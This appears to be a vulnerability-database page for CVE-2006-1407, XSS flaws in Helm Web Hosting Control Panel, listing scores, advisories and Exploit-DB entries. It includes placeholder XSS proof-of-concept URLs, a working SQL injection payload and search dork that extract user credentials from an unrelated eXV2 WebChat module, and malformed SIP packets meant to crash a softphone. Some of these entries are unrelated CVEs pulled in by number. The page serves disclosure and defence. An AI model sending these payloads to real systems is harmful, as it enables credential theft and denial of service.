CVE-2006-1407
published 2006-03-28CVE-2006-1407: Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3.2.10 and earlier allow remote attackers to inject arbitrary web script…
PriorityP421medium5.8CVSS 2.0
AVNACMAuNCPIPAN
EXPLOIT
EPSS
2.47%
82.5th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3.2.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) txtDomainName parameter to domains.asp or (2) SearchText or (3) UserLevel parameters to default.asp.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webhost_automation | helm_web_hosting_control_panel | <= 3.2.10 | — |
| webhost_automation | helm_web_hosting_control_panel | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-78w9-8p3h-w2r9: Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3
ghsa_unreviewed·2022-05-01·CVSS 5.8
CVE-2006-5984 [MEDIUM] GHSA-78w9-8p3h-w2r9: Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3
Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3.2.10 allow remote authenticated users to inject arbitrary web script or HTML via the (1) txtCompanyName, (2) txtEmail, or (3) txtUserAccNum parameter to (a) users.asp, or the (4) setThemeColour parameter to (b) default.asp in the Reseller and Admin levels; or the (5) setThemeColour parameter to default.asp in the User level. NOTE: the txtDomainName parameter to domains.asp is covered by CVE-2006-1407, which suggests that this vector is fixed in 3.2.10 stable.
GHSA
GHSA-6jqr-c9h5-fg6v: Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3
ghsa_unreviewed·2022-05-01
CVE-2006-1407 [MEDIUM] GHSA-6jqr-c9h5-fg6v: Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3
Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3.2.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) txtDomainName parameter to domains.asp or (2) SearchText or (3) UserLevel parameters to default.asp.
No detection rules found.
Exploit-DB
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1407 eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
---
##########################################
#
# Powered by eXV2 WebChat 1.60 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/WebChat"
#
###########################################
EXPLOIT 1 :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
WebChat 1.60
Submit date: 2006/6/13
Homepage: www.exv2.de
Version : 1.60
Downloads : 561
Filesize : 79.76 KB
Supported platforms : eXV2
#################################
Exploit-DB
Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting
exploitdb·2006-03-27
CVE-2006-1407 Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting
Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17263/info
Helm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
A beta version of 3.2.10 is reported to be vulnerable; other versions may also be affected.
http://www.example.com/interfaces/standard/domains.asp?txtDomainName=[XSS]
Exploit-DB
Web Host Automation Ltd. Helm 3.2.10 Beta - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-27
CVE-2006-1407 Web Host Automation Ltd. Helm 3.2.10 Beta - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities
Web Host Automation Ltd. Helm 3.2.10 Beta - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/17263/info
Helm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
A beta version of 3.2.10 is reported to be vulnerable; other versions may also be affected.
http://www.example.com/helmonlinehelp/default.asp?categoryID=24&UserLevel=2&SearchText=[XSS]
http://www.example.com/helmonlinehelp
Exploit-DB
eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
exploitdb·2006-02-14
CVE-2006-0737 eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
---
source: https://www.securityfocus.com/bid/16629/info
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
For the negative 'Expires' field issue:
OPTIONS sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 ;tag=1793
To: zwell
Call-ID: [email protected]
CSeq: 5185 OPTIONS
Expires: -127
For the 'Content-Length' field issue:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 ;tag=2386
To: zwell
Call-ID: [email protected]
CSeq: 4896 INVITE
Content-Type: applicati
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2006-March/000654.htmlhttp://pridels0.blogspot.com/2006/03/helm-web-hosting-control-panel-xss.htmlhttp://secunia.com/advisories/19375http://www.osvdb.org/24125http://www.osvdb.org/24126http://www.securityfocus.com/bid/17263http://www.vupen.com/english/advisories/2006/1093https://exchange.xforce.ibmcloud.com/vulnerabilities/25470https://exchange.xforce.ibmcloud.com/vulnerabilities/30309http://attrition.org/pipermail/vim/2006-March/000654.htmlhttp://pridels0.blogspot.com/2006/03/helm-web-hosting-control-panel-xss.htmlhttp://secunia.com/advisories/19375http://www.osvdb.org/24125http://www.osvdb.org/24126http://www.securityfocus.com/bid/17263http://www.vupen.com/english/advisories/2006/1093https://exchange.xforce.ibmcloud.com/vulnerabilities/25470https://exchange.xforce.ibmcloud.com/vulnerabilities/30309
2006-03-28
Published